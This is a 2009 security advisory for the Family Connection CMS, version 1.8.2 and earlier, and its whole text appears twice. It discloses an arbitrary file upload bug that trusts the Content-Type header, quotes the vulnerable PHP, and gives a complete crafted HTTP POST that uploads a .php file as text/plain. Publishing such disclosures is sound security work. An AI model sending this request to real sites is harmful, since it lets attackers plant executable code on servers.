******* Salvatore "drosophila" Fresta ******* [+] Application: Family Connection [+] Version: <= 1.8.2 [+] Website: http://www.familycms.com [+] Bugs: [A] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 3 Apr 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx@xxxxxxxxx ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Arbitrary File Upload [-] Files affected: documents.php inc/documents_class.php This bug allows a registered user to upload arbitrary files on the system. This is possible because there aren't controls on file extension but on the Content-Type header only, that can be changed easily. ... if (isset($_POST['submitadd'])) { $doc = $_FILES['doc']['name']; $desc = addslashes($_POST['desc']); if ($docs->uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) { ... function uploadDocument ($filetype, $filename, $filetmpname) { global $LANG; $known_photo_types = array('application/msword' => 'doc', 'text/plain' => 'txt', 'application/excel' => 'xsl', 'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl', 'application/x-compressed' => 'zip', 'application/x-zip-compressed' => 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip', 'application/rtf' => 'rtf', 'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf', 'application/mspowerpoint' => 'ppt', 'application/powerpoint' => 'ppt', 'application/vnd.ms-powerpoint' => 'ppt', 'application/x-mspowerpoint' => 'ppt', 'application/x-excel' => 'xsl', 'application/pdf' => 'pdf'); if (!array_key_exists($filetype, $known_photo_types)) { echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype ".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>"; return false; } else { copy($filetmpname, "gallery/documents/$filename"); return true; } } ... ************************************************* [+] Code - [A] Arbitrary File Upload The following is an example of a malicious package: POST /fcms/upload.php HTTP/1.1\r\n Host: localhost\r\n Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n Content-type: multipart/form-data, boundary=AaB03x\r\n Content-Length: 295\r\n\r\n --AaB03x\r\n Content-Disposition: form-data; name="doc"; filename="file.php"\r\n Content-Type: text/plain\r\n \r\n <?php echo "This is not a text file"?>\r\n --AaB03x\r\n Content-Disposition: form-data; name="desc"\r\n \r\n description\r\n --AaB03x\r\n Content-Disposition: form-data; name="submitadd"\r\n \r\n Submit\r\n --AaB03x--\r\n ************************************************* [+] Fix No fix. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351
******* Salvatore "drosophila" Fresta ******* [+] Application: Family Connection [+] Version: <= 1.8.2 [+] Website: http://www.familycms.com [+] Bugs: [A] Arbitrary File Upload [+] Exploitation: Remote [+] Date: 3 Apr 2009 [+] Discovered by: Salvatore "drosophila" Fresta [+] Author: Salvatore "drosophila" Fresta [+] Contact: e-mail: drosophilaxxx@xxxxxxxxx ************************************************* [+] Menu 1) Bugs 2) Code 3) Fix ************************************************* [+] Bugs - [A] Arbitrary File Upload [-] Files affected: documents.php inc/documents_class.php This bug allows a registered user to upload arbitrary files on the system. This is possible because there aren't controls on file extension but on the Content-Type header only, that can be changed easily. ... if (isset($_POST['submitadd'])) { $doc = $_FILES['doc']['name']; $desc = addslashes($_POST['desc']); if ($docs->uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) { ... function uploadDocument ($filetype, $filename, $filetmpname) { global $LANG; $known_photo_types = array('application/msword' => 'doc', 'text/plain' => 'txt', 'application/excel' => 'xsl', 'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl', 'application/x-compressed' => 'zip', 'application/x-zip-compressed' => 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip', 'application/rtf' => 'rtf', 'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf', 'application/mspowerpoint' => 'ppt', 'application/powerpoint' => 'ppt', 'application/vnd.ms-powerpoint' => 'ppt', 'application/x-mspowerpoint' => 'ppt', 'application/x-excel' => 'xsl', 'application/pdf' => 'pdf'); if (!array_key_exists($filetype, $known_photo_types)) { echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype ".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>"; return false; } else { copy($filetmpname, "gallery/documents/$filename"); return true; } } ... ************************************************* [+] Code - [A] Arbitrary File Upload The following is an example of a malicious package: POST /fcms/upload.php HTTP/1.1\r\n Host: localhost\r\n Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n Content-type: multipart/form-data, boundary=AaB03x\r\n Content-Length: 295\r\n\r\n --AaB03x\r\n Content-Disposition: form-data; name="doc"; filename="file.php"\r\n Content-Type: text/plain\r\n \r\n <?php echo "This is not a text file"?>\r\n --AaB03x\r\n Content-Disposition: form-data; name="desc"\r\n \r\n description\r\n --AaB03x\r\n Content-Disposition: form-data; name="submitadd"\r\n \r\n Submit\r\n --AaB03x--\r\n ************************************************* [+] Fix No fix. *************************************************